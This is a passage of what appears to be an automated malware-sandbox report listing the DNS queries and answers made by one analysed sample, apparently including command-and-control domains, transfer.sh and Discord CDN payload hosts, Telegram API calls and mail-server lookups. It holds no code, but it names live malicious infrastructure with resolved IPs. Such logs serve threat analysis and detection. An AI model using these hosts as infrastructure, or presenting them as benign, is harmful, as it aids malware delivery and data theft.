                                                                                                                        Jan 14, 2022 19:09:25.057566881 CET192.168.2.58.8.8.80x44dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.415585995 CET192.168.2.58.8.8.80x6ce0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.608776093 CET192.168.2.58.8.8.80xff0fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.781918049 CET192.168.2.58.8.8.80x85c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.971153021 CET192.168.2.58.8.8.80xacfStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:29.799472094 CET192.168.2.58.8.8.80xbf32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.237000942 CET192.168.2.58.8.8.80x6a35Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.404517889 CET192.168.2.58.8.8.80x71ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.368099928 CET192.168.2.58.8.8.80xf76cStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:46.057374954 CET192.168.2.58.8.8.80x7543Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.701255083 CET192.168.2.58.8.8.80xa402Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.869379044 CET192.168.2.58.8.8.80xd245Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.061209917 CET192.168.2.58.8.8.80xff90Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.685651064 CET192.168.2.58.8.8.80x682fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.867140055 CET192.168.2.58.8.8.80x6e11Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.037122011 CET192.168.2.58.8.8.80xde79Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.203223944 CET192.168.2.58.8.8.80xf614Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.369959116 CET192.168.2.58.8.8.80xc24dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.533875942 CET192.168.2.58.8.8.80xd299Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.705943108 CET192.168.2.58.8.8.80xcff8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.905255079 CET192.168.2.58.8.8.80x48d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.187428951 CET192.168.2.58.8.8.80x498fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.374730110 CET192.168.2.58.8.8.80xc996Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.642282963 CET192.168.2.58.8.8.80x8151Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.267733097 CET192.168.2.58.8.8.80x5361Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.433132887 CET192.168.2.58.8.8.80xc314Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.609422922 CET192.168.2.58.8.8.80xf7c5Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.989248037 CET192.168.2.58.8.8.80x4d2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.160315990 CET192.168.2.58.8.8.80xe30aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.346404076 CET192.168.2.58.8.8.80x8b73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.572753906 CET192.168.2.58.8.8.80x42a6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.744287968 CET192.168.2.58.8.8.80x5eb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.939517021 CET192.168.2.58.8.8.80x32e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:59.110661030 CET192.168.2.58.8.8.80xabaeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.348560095 CET192.168.2.58.8.8.80x8611Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.543709993 CET192.168.2.58.8.8.80x80e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.731966019 CET192.168.2.58.8.8.80xbba2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.919981003 CET192.168.2.58.8.8.80x53bbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:08.140322924 CET192.168.2.58.8.8.80x9f55Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.538479090 CET192.168.2.58.8.8.80xf62cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.788062096 CET192.168.2.58.8.8.80xe3c9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.958772898 CET192.168.2.58.8.8.80xf6ddStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:15.889401913 CET192.168.2.58.8.8.80xd2d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.059786081 CET192.168.2.58.8.8.80xafa8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.257030964 CET192.168.2.58.8.8.80xa528Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.758302927 CET192.168.2.58.8.8.80x96feStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.944961071 CET192.168.2.58.8.8.80xe098Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.004935026 CET192.168.2.58.8.8.80x8ab5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.170507908 CET192.168.2.58.8.8.80x4602Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.353204966 CET192.168.2.58.8.8.80x72b3Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:26.418530941 CET192.168.2.58.8.8.80x8ec9Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:27.932214975 CET192.168.2.58.8.8.80x970Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.099606991 CET192.168.2.58.8.8.80xdb9eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.560112953 CET192.168.2.58.8.8.80x7f32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.724280119 CET192.168.2.58.8.8.80x198cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.901891947 CET192.168.2.58.8.8.80xa4fcStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:31.461930037 CET192.168.2.58.8.8.80x387Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.138627052 CET192.168.2.58.8.8.80xf4eeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.386116982 CET192.168.2.58.8.8.80x3a28Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:33.787772894 CET192.168.2.58.8.8.80xe497Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.013952971 CET192.168.2.58.8.8.80x6864Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.291979074 CET192.168.2.58.8.8.80x5f07Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.669361115 CET192.168.2.58.8.8.80xbe71Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.835163116 CET192.168.2.58.8.8.80x130eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:36.012844086 CET192.168.2.58.8.8.80x7e50Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.088051081 CET192.168.2.58.8.8.80x490eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.963994026 CET192.168.2.58.8.8.80x6a1eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.740060091 CET192.168.2.58.8.8.80x55ccStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.765990973 CET192.168.2.58.8.8.80x247bStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.972399950 CET192.168.2.58.8.8.80xce19Standard query (0)ipwhois.appA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.654849052 CET192.168.2.58.8.8.80xb7cdStandard query (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyzA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.838181019 CET192.168.2.58.8.8.80xbecaStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:47.321703911 CET192.168.2.58.8.8.80x2e44Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:48.172898054 CET192.168.2.58.8.8.80xa86aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:57.879049063 CET192.168.2.58.8.8.80x71c1Standard query (0)dl.uploadgram.meA (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.204118013 CET192.168.2.58.8.8.80xc8faStandard query (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.225033045 CET192.168.2.58.8.8.80xd0a2Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jan 14, 2022 19:09:10.384404898 CET8.8.8.8192.168.2.50xddd3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:10.825388908 CET8.8.8.8192.168.2.50x8cb0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.314507008 CET8.8.8.8192.168.2.50xb88aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.499597073 CET8.8.8.8192.168.2.50x9f8aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:11.688426971 CET8.8.8.8192.168.2.50xac73No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:12.127974987 CET8.8.8.8192.168.2.50x8f08No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:13.506998062 CET8.8.8.8192.168.2.50x9857No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:13.966306925 CET8.8.8.8192.168.2.50xc3e6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:14.136221886 CET8.8.8.8192.168.2.50x5f4fNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:16.192797899 CET8.8.8.8192.168.2.50xb8b3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:16.360732079 CET8.8.8.8192.168.2.50x82e5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:16.852404118 CET8.8.8.8192.168.2.50xdc51No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:17.337629080 CET8.8.8.8192.168.2.50x4068No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:17.837946892 CET8.8.8.8192.168.2.50xfeedNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.073492050 CET8.8.8.8192.168.2.50x7aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.244182110 CET8.8.8.8192.168.2.50x6c1cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.517277002 CET8.8.8.8192.168.2.50xa496No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.593890905 CET8.8.8.8192.168.2.50xa674No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.774349928 CET8.8.8.8192.168.2.50x2ae1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:21.949736118 CET8.8.8.8192.168.2.50x45adNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.123107910 CET8.8.8.8192.168.2.50x58feNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:22.587418079 CET8.8.8.8192.168.2.50xc071No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.557038069 CET8.8.8.8192.168.2.50x9c96No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.728074074 CET8.8.8.8192.168.2.50x80f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:24.903656006 CET8.8.8.8192.168.2.50xa1aaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:25.076198101 CET8.8.8.8192.168.2.50x44dfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.434825897 CET8.8.8.8192.168.2.50x6ce0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.628560066 CET8.8.8.8192.168.2.50xff0fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.801300049 CET8.8.8.8192.168.2.50x85c6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.991117954 CET8.8.8.8192.168.2.50xacfNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.991117954 CET8.8.8.8192.168.2.50xacfNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.991117954 CET8.8.8.8192.168.2.50xacfNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.991117954 CET8.8.8.8192.168.2.50xacfNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:27.991117954 CET8.8.8.8192.168.2.50xacfNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.085545063 CET8.8.8.8192.168.2.50xbf32No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.256505013 CET8.8.8.8192.168.2.50x6a35No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:30.421962976 CET8.8.8.8192.168.2.50x71ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:43.396714926 CET8.8.8.8192.168.2.50xf76cNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:46.160974026 CET8.8.8.8192.168.2.50x7543No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.718183994 CET8.8.8.8192.168.2.50xa402No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:51.889224052 CET8.8.8.8192.168.2.50xd245No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.358066082 CET8.8.8.8192.168.2.50xff90No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.703072071 CET8.8.8.8192.168.2.50x682fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:52.886606932 CET8.8.8.8192.168.2.50x6e11No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.056230068 CET8.8.8.8192.168.2.50xde79No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.222333908 CET8.8.8.8192.168.2.50xf614No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.389302015 CET8.8.8.8192.168.2.50xc24dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.551351070 CET8.8.8.8192.168.2.50xd299No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.725091934 CET8.8.8.8192.168.2.50xcff8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:53.922821999 CET8.8.8.8192.168.2.50x48d4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.206341982 CET8.8.8.8192.168.2.50x498fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.392158031 CET8.8.8.8192.168.2.50xc996No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:54.660291910 CET8.8.8.8192.168.2.50x8151No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.285299063 CET8.8.8.8192.168.2.50x5361No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.452198982 CET8.8.8.8192.168.2.50xc314No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.630558014 CET8.8.8.8192.168.2.50xf7c5No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:57.630558014 CET8.8.8.8192.168.2.50xf7c5No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.006366014 CET8.8.8.8192.168.2.50x4d2aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.180192947 CET8.8.8.8192.168.2.50xe30aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.365708113 CET8.8.8.8192.168.2.50x8b73No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.593264103 CET8.8.8.8192.168.2.50x42a6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.764146090 CET8.8.8.8192.168.2.50x5eb0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:58.960181952 CET8.8.8.8192.168.2.50x32e9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:09:59.130079031 CET8.8.8.8192.168.2.50xabaeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.366018057 CET8.8.8.8192.168.2.50x8611No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.561201096 CET8.8.8.8192.168.2.50x80e8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.751497030 CET8.8.8.8192.168.2.50xbba2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:07.938688040 CET8.8.8.8192.168.2.50x53bbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:08.159094095 CET8.8.8.8192.168.2.50x9f55No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.556054115 CET8.8.8.8192.168.2.50xf62cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.807543993 CET8.8.8.8192.168.2.50xe3c9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:12.975985050 CET8.8.8.8192.168.2.50xf6ddNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:15.908402920 CET8.8.8.8192.168.2.50xd2d7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.078675985 CET8.8.8.8192.168.2.50xafa8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:16.582515955 CET8.8.8.8192.168.2.50xa528No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:17.777923107 CET8.8.8.8192.168.2.50x96feNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:18.231518984 CET8.8.8.8192.168.2.50xe098No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.023981094 CET8.8.8.8192.168.2.50x8ab5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.189588070 CET8.8.8.8192.168.2.50x4602No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:25.382838011 CET8.8.8.8192.168.2.50x72b3No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:26.740726948 CET8.8.8.8192.168.2.50x8ec9No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:27.951181889 CET8.8.8.8192.168.2.50x970No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.408941984 CET8.8.8.8192.168.2.50xdb9eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.579654932 CET8.8.8.8192.168.2.50x7f32No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.743089914 CET8.8.8.8192.168.2.50x198cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:28.921109915 CET8.8.8.8192.168.2.50xa4fcNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:31.481004000 CET8.8.8.8192.168.2.50x387No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.155909061 CET8.8.8.8192.168.2.50xf4eeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:32.403192043 CET8.8.8.8192.168.2.50x3a28No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:33.806910038 CET8.8.8.8192.168.2.50xe497No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.033373117 CET8.8.8.8192.168.2.50x6864No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:34.311547041 CET8.8.8.8192.168.2.50x5f07No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.688616037 CET8.8.8.8192.168.2.50xbe71No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:35.854535103 CET8.8.8.8192.168.2.50x130eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:36.034266949 CET8.8.8.8192.168.2.50x7e50No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
